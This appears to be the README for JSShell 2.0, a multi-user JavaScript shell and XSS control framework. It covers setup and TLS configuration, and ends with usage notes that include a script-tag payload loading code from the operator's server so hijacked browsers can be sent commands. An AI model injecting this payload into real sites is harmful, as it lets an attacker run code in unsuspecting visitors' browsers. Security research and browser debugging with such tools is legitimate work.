An interactive multi-user web-based JavaScript shell. It was initially created in order to debug remote esoteric browsers during experiments and research. This tool can be easily attached to an XSS (Cross Site Scripting) payload to achieve browser remote code execution (similar to the BeeF framework).

Version 2.0 was created entirely from scratch, introducing new exciting features, stability and maintainability.
- `<script>` tags

In the `resources` directory, update the `config.json` file with your desired configuration. For the `docker` deployment method, choose the database host as `db`. The `shell.js` file does some AJAX calls to register and poll `http[s]://{YOUR_SERVER_IP}:{PORT}`.
Now JSShell supports TLS, which means you can now generate TLS certificates and feed them to the web server. The web server will infer the domain name from the `config.json` file. In order to create the certificate, use the `create_cert.py` script in the `scripts` folder:

```shell
$ cd scripts
$ python create_cert.py --domain <YOUR_DOMAIN> --email <YOUR_EMAIL>
```
Please note that the web server must be down in order for the script to function properly. At this point, we have successfully generated our certificates! The sole modifications we need to do are:

- In the `config.json` file, change the schema of the `URL` field to `https`.
- In the `docker-compose.yml` file, change the exposed port of the `web` container to `443`.
This new version supports installing and running JSShell via `docker` and `docker-compose`. Now, to install and run the entire JSShell framework, simply run:

```shell
$ ./scripts/start_docker_shell.sh
```

This will:

- JSShell command line interface container

If you still want to use the old-fashioned method of installing, simply make sure you have a MongoDB database up and running, and update the `config.json` file residing in the `resources` directory.
I recommend using a virtual environment with `pyenv`:

```shell
$ pyenv virtualenv -p python3.6 venv
$ pyenv activate venv
```

Or using `virtualenv`:

```shell
$ virtualenv -p python3.6 venv
$ source venv/bin/activate
```

Then, install the requirements:

```shell
$ pip install -r requirements.txt
```
If you used the `docker` method, there's no need to run the following procedure. Otherwise, once we have the database set up, we need to start the web API server. To do so, run:

```shell
$ python manage.py web
```

This will create and run a web server that listens for incoming connections and serves our JSShell code.

Now, to start the JSShell CLI, run the same script but with the `shell` flag:

```shell
$ python manage.py shell
```

After setting up and running the required components, enter the `help` command to see the available commands:
```text
2.0
by @Daniel_Abeles

>> help
Documented commands (type help <topic>):

General Commands
--------------------------------------------------------------------------------
edit        Edit a file in a text editor
help        List available commands or provide detailed help for a specific command
history     View, run, edit, save, or clear previously entered commands
ipy         Enter an interactive IPython shell
py          Invoke Python command or shell
quit        Exit this application

Shell Based Operations
--------------------------------------------------------------------------------
back        Un-select the current selected client
clients     List and control the clients that have registered to our system
commands    Show the executed commands on the selected client
dump        Dumps a command to the disk
execute     Execute commands on the selected client
select      Select a client as the current client

>>
```
JSShell supports 2 methods of operation:

1. Similar to other XSS control frameworks (like BeeF), JSShell is capable of managing successful XSS exploitations. For example, if you can inject a `script` tag, inject the following resource into your payload, and a new client will appear in your console:

   ```html
   <script src="http[s]://{YOUR_SERVER_IP}:{PORT}/content/js"></script>
   ```

2. If you desire to debug exotic and esoteric browsers, you can simply navigate to `http[s]://{YOUR_SERVER_IP}:{PORT}/` and a new client will pop up in your JSShell CLI client. Now it is debuggable via our JSShell console.
Credits: Canop for JSON.prune